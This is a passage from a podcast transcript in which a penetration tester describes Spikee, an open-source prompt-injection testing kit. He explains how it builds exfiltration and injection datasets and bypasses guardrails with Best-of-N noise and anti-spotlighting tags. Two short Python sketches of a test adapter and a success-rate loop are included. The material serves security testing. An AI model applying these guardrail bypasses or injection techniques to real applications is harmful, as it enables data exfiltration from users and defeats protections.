have a button that I can click that summarizes an email, that is not even a conversational agent. If I send an email in and there is an entire chain of stuff that happens, I can't run a general-purpose tool against it; it doesn't make sense. So we started writing scripts, individual scripts that we used

(42:28):
to create datasets. And obviously for us, this thing needed to be practical. Now, I have five days, six days to do a test for a client. And within those days, I need to be able, even in an isolated environment, to give the client an idea of what an attacker could do. So you have all of these wish lists

(42:51):
of things. So my wish list was: I need to be able to run this practically in a pen test. I need to be able to generate a dataset which is customised for what makes sense in that application. Like, for example, I wanted a dataset that I could use, whenever it mattered, to test data exfiltration via markdown images, versus HTML

(43:15):
injection, JavaScript injection, versus harmful content, topic control. A lot of our clients, for example, say, I don't want my chatbot to give out investment advice. Actually, we would be liable if that happened. But every use case is different. So I needed something where I could very quickly create these datasets, and then it could be as

(43:39):
big or as small as I needed it to be. Now, sometimes we go to clients and they tell us, oh, you can send 100,000 requests a day. Fine. I'm going to have a very large dataset. Sometimes we go to clients and they say, you can only send 1,000 prompts a day. So you need to be very careful, because that's an application. That's not an LLM inference endpoint.

(44:02):
So you need to be very careful, and you need to create a dataset that answers the questions of the client. Can people exfiltrate data? Can people make this thing give financial advice? And then you also have general stuff like toxic content, hate speech. Yeah, any tool covers that. But we needed practical stuff, and we needed to be able to run it in completely isolated

(44:24):
environments. Like, if you don't have access... we needed something where I didn't need to give it an OpenAI key. Okay? That is really important. And you know, some of the stuff we can check with regular expressions, whether we've been successful. But we had to figure out a way that, if I am in an isolated environment and I have a dataset that I'm generating to

(44:46):
test whether the application is going to give out financial advice, but I cannot call a judge LLM to tell me whether the output is actually financial advice, how do I deal with that? So we had to find a solution for that. It needed to be simple, so that we could have a team of pen testers use it. It needed to be extensible. So it needed to be modular, so that if one of my

(45:11):
colleagues has an application in front of them... let's say, this is something that we do see: I think one of our colleagues in the US, Steve, had a chatbot that was using WebSockets. Now, he spent the first day crying, trying to reverse engineer that protocol. And then on day two, and he can do that

(45:34):
with Spikee, he wrote a Spikee module that uses Playwright. So the Spikee module used a headless browser to open the chatbot, send the prompt, and read the response. We were the only pen testing company working on that chatbot that was actually able to programmatically test a lot of

(45:54):
stuff. I think another one of our guys was working on some AWS infrastructure. And the way you introduce the prompt is by dropping a file on an S3 bucket, calling a Lambda, and then in another S3 bucket, one minute later, you would have another file that was the result

(46:16):
of the pipeline that eventually called the LLM. So, we needed a way where a consultant could, within a day, look at whatever they had in front of them and create an easy module, so that Spikee could take stuff from the dataset, send it there, read the response, and then say whether the attack was

(46:37):
successful or not. And then we wanted to be able to extend it with guardrail bypasses. So we have a lot of attacks where you take the standard dataset and then you can say, okay, for each of these entries in the dataset, I want you to try up to 100 variations using the Best-of-N attack, so introducing noise,

(47:00):
versus using the anti-spotlighting attack, which is another attack that we developed, where you try to break spotlighting by introducing tags and strange stuff so the LLM doesn't understand where data starts. So all of these things, and it needed to be simple. And sorry, that was a very long answer, but that's what we've been working

(47:21):
on for the last year. And we made the whole thing open source. We've actually had people from the community, from other companies, contribute. So it's been very fun to put this together.
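
To make the "write an adapter on day one" idea concrete, here is a minimal sketch of what a target module in that spirit could look like, driving a hypothetical chat widget with Playwright. This is not Spikee's actual module interface; the URL, selectors, and the process_input() signature are illustrative assumptions.

```python
# Hypothetical target adapter in the spirit described above: the test harness
# hands it a prompt from the dataset, it drives the application like a user,
# and it returns the raw response for success/failure scoring. Not Spikee's
# real API; URL, selectors, and the function signature are assumptions.

from playwright.sync_api import sync_playwright

CHATBOT_URL = "https://app.example.internal/chat"   # assumption: the client app under test

def process_input(prompt: str, timeout_ms: int = 30_000) -> str:
    """Send one dataset entry through the real UI and return the chatbot's reply."""
    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        page = browser.new_page()
        page.goto(CHATBOT_URL)
        page.locator("textarea#chat-input").fill(prompt)   # selector is an assumption
        page.locator("button#send").click()
        last_reply = page.locator(".assistant-message").last
        last_reply.wait_for(timeout=timeout_ms)             # wait for the app to respond
        reply = last_reply.inner_text()
        browser.close()
        return reply

# The harness would then loop over the generated dataset, call process_input()
# for each entry, and check the reply (e.g. with a regex for a canary URL)
# to decide whether the attack succeeded.
```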

Chris (47:35):
No, it sounds really cool. And by the way, I don't remember if we identified what Spikee breaks down to, the acronym: it's Simple Prompt Injection Kit for Evaluation and Exploitation, in case we didn't say that out loud. But I was curious, as you're going through the different kinds of construction of the attacks and writing modules and

(47:57):
stuff, I am wondering, as you're using Spikee, how much of it is pretty standard built-in tools that you have there on any given engagement when you're using the tool to do the pen testing, versus how often, in a typical engagement, are you

(48:18):
having to create custom modules that are very specific to a particular client's needs? As you were going through it, I was trying to decipher that, but I wasn't sure that I understood, like, the toolkit as it exists versus saying, ah, for this client, I need to add this thing in. What does that look like typically?

Donato (48:36):
So typically, on the first day of a test, you write a module which is going to allow Spikee to talk to the application. So that depends on what the application is. The first day is typically writing this kind of adapter. It could be very easy if you have a REST API, or, again, as we were doing,

(48:57):
you can write Playwright, you can use the AWS API. So whatever that is, that's the biggest part. And then you look at what you are trying to test, data exfiltration and stuff like that. You have what we call seeds. So you don't have prebuilt datasets. You have seeds

(49:18):
that allow you to build datasets, which can take five to ten minutes to customise. But basically what happens there is that you have jailbreaks, which are common things that typically you don't touch. Then you have instructions, and the instructions are what you customise. So if I want to test data exfiltration, social

(49:42):
engineering, HTML injection, I will add or modify the instructions in there. So it might take five minutes, but basically we only test things that make sense for that application. So we create the dataset, and then, once you have the target adapter that allows Spikee to talk to your application and you have the dataset that makes sense for

(50:05):
your client, you will run that dataset, and then you will rerun it again with different attack techniques. So we would say, okay, what happens now? We have a 10% attack success rate. Maybe that's okay. Maybe we want to see what happens if we now implement Best-of-N, this attack that introduces noise. Is that going to bypass

(50:27):
the guardrails? Typically, the attack success rate goes up. And then we try all these different things and maybe change the parameters. So, to answer your question, there is a bit of customization to make sure that what we do makes sense for the application. But then there is a lot of built-in attack modules that do the heavy lifting for you.
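
A minimal sketch of the rerun-with-variations loop outlined here: take the baseline dataset, apply an attack transformation (a naive stand-in for a noise-based Best-of-N style variation), and compare attack success rates. The variation function, success check, and dataset format are illustrative assumptions, not Spikee's actual internals.

```python
# Hypothetical sketch of measuring attack success rate (ASR) with and without
# an attack technique that generates variations of each dataset entry.
# The variation function and success check are stand-ins, not Spikee internals.

import random
import re

def best_of_n_variations(prompt: str, n: int = 100) -> list[str]:
    """Naive noise-based variations (random casing); real Best-of-N is more involved."""
    rng = random.Random(0)
    return ["".join(c.upper() if rng.random() < 0.3 else c for c in prompt) for _ in range(n)]

def attack_succeeded(response: str) -> bool:
    # Illustrative check: did the app emit our canary exfiltration URL?
    return re.search(r"https://canary\.example/", response) is not None

def attack_success_rate(dataset: list[str], send, variations=None) -> float:
    successes = 0
    for entry in dataset:
        candidates = [entry] if variations is None else variations(entry)
        # An entry counts as a success if any variation gets through.
        if any(attack_succeeded(send(candidate)) for candidate in candidates):
            successes += 1
    return successes / len(dataset)

# Usage with the process_input() adapter sketched earlier (both hypothetical):
# baseline = attack_success_rate(dataset, process_input)
# boosted  = attack_success_rate(dataset, process_input, variations=best_of_n_variations)
# print(f"ASR baseline {baseline:.0%} -> with Best-of-N {boosted:.0%}")
```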

Chris (50:51):
That sounds really cool. I'm looking forward to trying it out myself. You really have me intrigued. As we are winding up here, one of the things that we like to try to get a sense of when finishing is where things are going. And, you know, you are in this really cutting-edge

(51:11):
area, the merging of security and AI and all of the new types of risks that people face out there. And you guys have made so much progress over the last year or two. I'm wondering, as you're looking ahead, both at what you're doing at your organization and also at the larger industry, since you're

(51:35):
participating in all of these different touch points, going to different conferences and stuff like that: where do you see this going? What kind of evolution are you expecting going forward? And as part of that, what do you want to see? Like, when, at the end of the day, you're

(51:56):
able just to kinda ponder, and maybe have a glass of wine or whatever you do at night, what is the thing where you're like, that would be cool, I wanna go do that? Whether or not it's on the plan right now or just an idea. Wax poetic for me a little bit on this, because I'm kinda curious where this industry might be going.

Donato (52:14):
Oh, I wish I knew, to be honest. I think, realistically, what I would like to see is people shifting the cybersecurity mindset from let's do LLM red teaming to let's secure LLM applications and use cases using a design pattern

(52:39):
that actually makes sense. So let's stop asking LLMs to say that humanity is stupid or how to make a bomb, and let's start looking at our applications and ensuring that they can be used in a safe way if they have access to tools and stuff like that. Because I think that's going to be one of the big

(53:01):
issues that we're going to have. If people don't start seriously taking the risks that come from LLM agents, we are going to see real-world, big breaches coming from that. So what I would like to see is shifting that discussion from LLM red teaming to system design that takes into account the fact

(53:25):
that we don't know how to solve prompt injection and jailbreaking in LLMs. When somebody figures it out, I will be the happiest person in the world. But I believe Sam Altman last year said they would have solved hallucinations, and I am not going to continue.

Chris (53:42):
Right. That's a good way to end right there. Donato, thank you so much for coming on Practical AI. A really fascinating conversation. I am excited about this, and I hope you come back again. I know we've already had a couple of conversations, but they're always fun. As new things are happening for

(54:03):
you, don't hesitate to let us know what's going on and keep us apprised of what the space looks like.

Donato (54:09):
Thank you very much for having me.

Jerod (54:18):
All right, that's our show for this week. If you haven't checked out our website, head to practicalai.fm, and be sure to connect with us on LinkedIn, X, or Bluesky. You'll see us posting insights related to the latest AI developments, and we would love for you to join the conversation. Thanks to our partner, Prediction Guard, for providing operational support for the show. Check them out at predictionguard.com.

(54:41):
Also, thanks to Breakmaster Cylinder for the beats, and to you for listening. That's all for now, but you'll hear from us again next week.